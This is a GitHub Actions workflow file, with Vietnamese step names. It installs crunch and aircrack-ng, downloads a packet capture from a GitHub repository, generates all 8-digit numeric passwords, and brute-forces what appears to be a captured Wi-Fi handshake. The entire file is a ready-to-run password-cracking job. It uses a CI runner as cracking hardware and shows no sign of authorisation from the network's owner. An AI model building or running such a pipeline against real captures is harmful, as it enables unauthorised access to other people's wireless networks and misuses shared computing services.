name: Aircarck-ng
on:
    workflow_dispatch:
    #schedule:
    # * is a special character in YAML so you have to quote this string
    #- cron:  "0 */4 * * *"
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    #  with:
    #    persist-credentials: false
    #    fetch-depth: 0
    - name: Chuan bi File
      run: |
        sudo apt install -y crunch
        sudo apt install -y aircrack-ng
        wget -O file.cap 'https://raw.githubusercontent.com/sattheptonghop/acr-ga/main/file.cap'
        crunch 8 8 0123456789 -o wordlist-probable.txt
    - name: Aircrack
      run: |
        sudo aircrack-ng file.cap -w wordlist-probable.txt
